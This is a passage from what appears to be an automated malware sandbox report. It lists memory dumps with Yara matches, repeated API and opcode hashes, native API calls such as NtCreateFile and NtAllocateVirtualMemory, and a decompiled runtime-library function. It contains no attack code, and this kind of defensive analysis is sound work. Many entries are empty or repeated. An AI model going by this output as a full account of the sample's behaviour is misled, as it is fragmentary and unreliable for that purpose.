                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ExitProcess
                                                                                        • String ID:
                                                                                        • API String ID: 621844428-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Non-executed Functions

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%


                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                                                        • Instruction ID: 04620aa6bb27d2803001550eeb25a7b6fbdadabc51dcd26a2ee6263f5864c7d4
                                                                                        • Opcode Fuzzy Hash: 6c51ee4c99e8a14c8e8f452059d24e596f1cad2234df4a471970d7b31d795eea
                                                                                        • Instruction Fuzzy Hash: 3990027220100802E214619948046860445D7D0341F51C065A602465DE96E588A1B171
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                                                        • Instruction ID: aec79115d10e9f29738519f80e8b9a6866d442d6f00b0e29aa5afbb39a493aa5
                                                                                        • Opcode Fuzzy Hash: bef9032e1af81788617f6d42cae955148e72da0d0f433e852416687c76d33f19
                                                                                        • Instruction Fuzzy Hash: E39002A221100042E214619944047060485D7E1341F51C066A215455CCC5A98C71A165
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                                                        • Instruction ID: b8ce471e7c7a138346ab2ae922cfa3cf3e060195f39402d61ad55433f7c77e70
                                                                                        • Opcode Fuzzy Hash: 52be32c7dfa7951f1ea00aab82bd2d40db4785afb673e1f8e0cd7769511c122b
                                                                                        • Instruction Fuzzy Hash: E69002E2201140929610A2998404B0A4945D7E0341B51C06AE1054568CC5A58861E175
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                                                        • Instruction ID: 8e6825e6d6d7f7841f06e553eb539a3830a05f6e9ebce233d1af554e9509b2c3
                                                                                        • Opcode Fuzzy Hash: 4431b7a0fee3c6e4234b446d916f211dfc089ebc4c8e3476879d7b817246d855
                                                                                        • Instruction Fuzzy Hash: D2900272A0500012E250719948146464446E7E0781B55C065A051455CC89D48A65A3E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                                                        • Instruction ID: 646f29aa433657a7f6b878a5bb0b9a24a25762606e4e418690446bbce2054d3c
                                                                                        • Opcode Fuzzy Hash: 99f7eb3025f0c89b7a8e7508f29e9fe1f57eeffef6c1518c9c71b137114873eb
                                                                                        • Instruction Fuzzy Hash: A7900266221000025255A599060450B0885E7D6391391C069F1416598CC6A18875A361
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                                                        • Instruction ID: 9f7130504737311f860d6fe042bcfaae4cab1c20afcb2dbc1997fe53db8d0800
                                                                                        • Opcode Fuzzy Hash: 74a4b5113503b153e2a98cbceade7bfe6cc65f23d35041b27878dd7ca3ffbd45
                                                                                        • Instruction Fuzzy Hash: DF9002A220140403E250659948046070445D7D0342F51C065A206455DE8AA98C61B175
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                                                        • Instruction ID: 40e25c194c463a6d34ac6240e12ccfff647f7827ab26df814024db3cc07110ab
                                                                                        • Opcode Fuzzy Hash: 6b3fb8c6899896d22c6015728d867cabe2131fdf08b34cba61306e72ac60fb6b
                                                                                        • Instruction Fuzzy Hash: 9B90026220144442E25062994804B0F4545D7E1342F91C06DA415655CCC9958865A761
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                                                        • Instruction ID: a37e0ac19c17650d967899adc70e5001e93e6495321535b97a5631664e3e0301
                                                                                        • Opcode Fuzzy Hash: ab2771a95a23b2a1b2d0513c90912b818e51e737685e1b015844a9d9965b899e
                                                                                        • Instruction Fuzzy Hash: A990027220100842E21061994404B460445D7E0341F51C06AA012465CD8695C861B561
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                                                        • Instruction ID: cd24ce0a2d859d488f7286c22e6ed8d97b73ccb990e070c3ae511c639ad71a24
                                                                                        • Opcode Fuzzy Hash: bc996f631d075207eb20bee090e9a1777ec0a172b9c74c8d97129a8e54dc1bf8
                                                                                        • Instruction Fuzzy Hash: 5590027220140402E210619948087470445D7D0342F51C065A516455DE86E5C8A1B571
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                                                        • Instruction ID: c30fa2a5d7bca0bf62d3acebf9975c41ed408afd4442960619b60668b41d913b
                                                                                        • Opcode Fuzzy Hash: 3af5aa1a216671f2d58ce2519f4a66c502a3231183f9e71a3a696c114529cfa9
                                                                                        • Instruction Fuzzy Hash: 9B90027260500802E260719944147460445D7D0341F51C065A002465CD87D58A65B6E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                                                        • Instruction ID: 1279ba6ebe872f0cb41666492246e9200b7eb4ee599fedda41a5a78d08eff8db
                                                                                        • Opcode Fuzzy Hash: 659be69f6537c6856b4a278d7e34b3605983dad96ab7a4e001a885d5ded794e9
                                                                                        • Instruction Fuzzy Hash: 5790027220504842E25071994404A460455D7D0345F51C065A006469CD96A58D65F6A1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                                                        • Instruction ID: 3cdc3c48c5b0749e7d2c3f303ad117662c45c56e1d3a974a83615c23a46df001
                                                                                        • Opcode Fuzzy Hash: d320d025aca6d39b799e3493798dfb9d4116caa43e9f19ee7a14701c62f4b323
                                                                                        • Instruction Fuzzy Hash: 7990027220144002E2507199844460B5445E7E0341F51C465E042555CC86958866E261
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                                                                        • Instruction ID: b962c6b9c91677f59eabb441c46901add7741bb2ad88d548c5bcf5e74d541984
                                                                                        • Opcode Fuzzy Hash: fb235cc81d1d297f08340f6198d408b720472cb025dcc21c65d616e335a7f04c
                                                                                        • Instruction Fuzzy Hash: 3A90026224100802E250719984147070446D7D0741F51C065A002455CD86968975B6F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction ID: fb8dc60d3c8ed19cd1cc89408650463b5fda6c01436fcdf4bfc276a0f888acbd
                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                        • Instruction Fuzzy Hash:
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 53%
                                                                                        			E00B4FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                        				void* _t7;
                                                                                        				intOrPtr _t9;
                                                                                        				intOrPtr _t10;
                                                                                        				intOrPtr* _t12;
                                                                                        				intOrPtr* _t13;
                                                                                        				intOrPtr _t14;
                                                                                        				intOrPtr* _t15;
                                                                                        
                                                                                        				_t13 = __edx;
                                                                                        				_push(_a4);
                                                                                        				_t14 =  *[fs:0x18];
                                                                                        				_t15 = _t12;
                                                                                        				_t7 = E00AFCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                        				_push(_t13);
                                                                                        				L00B45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                        				_t9 =  *_t15;
                                                                                        				if(_t9 == 0xffffffff) {
                                                                                        					_t10 = 0;
                                                                                        				} else {
                                                                                        					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                        				}
                                                                                        				_push(_t10);
                                                                                        				_push(_t15);
                                                                                        				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                        				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                        				return L00B45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                        			}











                                                                                        APIs
                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B4FDFA
                                                                                        Strings
                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B4FE01
                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B4FE2B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000003.00000002.388405115.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                        • API String ID: 885266447-3903918235
                                                                                        • Opcode ID: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                                                        • Instruction ID: 1f4e07b77d35b4ba5142125bbdeffbf0eaf4acf1dba3b77c0922343a4df4e460
                                                                                        • Opcode Fuzzy Hash: 484480507d3c412a0a2761b0f1e5dff892c77e077c6e9ac8e61688b361fc9d6b
                                                                                        • Instruction Fuzzy Hash: 71F0F632240605BFD6201A45DD02F33BB9AEB45730F240364F628565E2DA62FD30A7F1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Executed Functions

                                                                                        APIs
                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,02C74B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02C74B87,007A002E,00000000,00000060,00000000,00000000), ref: 02C79DAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFile
                                                                                        • String ID: .z`
                                                                                        • API String ID: 823142352-1441809116
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtClose.NTDLL(02C74D20,?,?,02C74D20,00000000,FFFFFFFF), ref: 02C79EB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close
                                                                                        • String ID:
                                                                                        • API String ID: 3535843008-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtReadFile.NTDLL(02C74D42,5EB6522D,FFFFFFFF,02C74A01,?,?,02C74D42,?,02C74A01,FFFFFFFF,5EB6522D,02C74D42,?,00000000), ref: 02C79E55
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileRead
                                                                                        • String ID:
                                                                                        • API String ID: 2738559852-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02C62D11,00002000,00003000,00000004), ref: 02C79F79
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateMemoryVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 2167126740-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: f6b56a8bde674e0765e16cc015421d5c8b570d467e4dcfa851347ee7bf922169
                                                                                        • Instruction ID: cebf8605423069f7ebb7813aa88976d0dc908b40ef7174244fd457854b1a7199
                                                                                        • Opcode Fuzzy Hash: f6b56a8bde674e0765e16cc015421d5c8b570d467e4dcfa851347ee7bf922169
                                                                                        • Instruction Fuzzy Hash: B59002A1243042527545B55B4405527404AA7E06C5791C012A5405950C9566E856E661
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e7701de7518775be3d26dc86c644e1273dae76f55618f2c24fb08d932395f0fe
                                                                                        • Instruction ID: 75d73bd7d54158b52a0acb39d65c77b18f4057f3a424130d883ccc44208bab31
                                                                                        • Opcode Fuzzy Hash: e7701de7518775be3d26dc86c644e1273dae76f55618f2c24fb08d932395f0fe
                                                                                        • Instruction Fuzzy Hash: FE9002A5212001032105A95B0705527008A97D57D5351C021F5006550CE661D8616161
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 26b324d96696c35a8da03ab9c1751ca5a23e5a291f13aa64ceeaa7974df82564
                                                                                        • Instruction ID: 34913c900e73c877de100783b2ccf00ade3b09cad80a514aaaa90a5f24e82e46
                                                                                        • Opcode Fuzzy Hash: 26b324d96696c35a8da03ab9c1751ca5a23e5a291f13aa64ceeaa7974df82564
                                                                                        • Instruction Fuzzy Hash: 1C9002F120200502F140755B4405766004997D0785F51C011A9055554E9699DDD576A5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 9ab58cfbc7fa0284e32cd60b757af413ebce928c49ca8e0cf8d43511fca9e598
                                                                                        • Instruction ID: 7c16ef0ca69cfa12fcd7b39b54403129c003ccfb3c76852d471b5deb3ef538d6
                                                                                        • Opcode Fuzzy Hash: 9ab58cfbc7fa0284e32cd60b757af413ebce928c49ca8e0cf8d43511fca9e598
                                                                                        • Instruction Fuzzy Hash: B49002E1203001036105755B4415636404E97E0685B51C021E5005590DD565D8917165
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 277e45add2124a904f2e76263dea1625bd23674e97173864a120c956c350dd89
                                                                                        • Instruction ID: be6bb6f854353e570019d2ea44559c4698a0b5c2fac1c4373bdb1c7a232ec42f
                                                                                        • Opcode Fuzzy Hash: 277e45add2124a904f2e76263dea1625bd23674e97173864a120c956c350dd89
                                                                                        • Instruction Fuzzy Hash: ED9002E134200542F100655B4415B260049D7E1785F51C015E5055554D9659DC527166
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp Download File
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 70ecbce237b596f5a93e7cc27c02af4504c0e02ab501d9f0e9211547abaf673f
                                                                                        • Instruction ID: a611e9e84c293151088fa8e58e4e3fed00026a04394e91fee16f7a567dc630dd
                                                                                        • Opcode Fuzzy Hash: 70ecbce237b596f5a93e7cc27c02af4504c0e02ab501d9f0e9211547abaf673f
                                                                                        • Instruction Fuzzy Hash: 739002B120200902F180755B440566A004997D1785F91C015A4016654DDA55DA5977E1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591953387.0000000004670000.00000040.00000001.sdmp, Offset: 04670000, based on PE: true
                                                                                        • Associated: 00000007.00000002.592492745.000000000478B000.00000040.00000001.sdmp
                                                                                        • Associated: 00000007.00000002.592508394.000000000478F000.00000040.00000001.sdmp
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(02C74506,?,02C74C7F,02C74C7F,?,02C74506,?,?,?,?,?,00000000,00000000,?), ref: 02C7A05D
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C63AF8), ref: 02C7A09D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree
                                                                                        • String ID: .z`
                                                                                        • API String ID: 2488874121-1441809116
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C63AF8), ref: 02C7A09D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02C63AF8), ref: 02C7A09D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Offset: 02C60000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FreeHeap
                                                                                        • String ID: .z`
                                                                                        • API String ID: 3298025750-1441809116
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
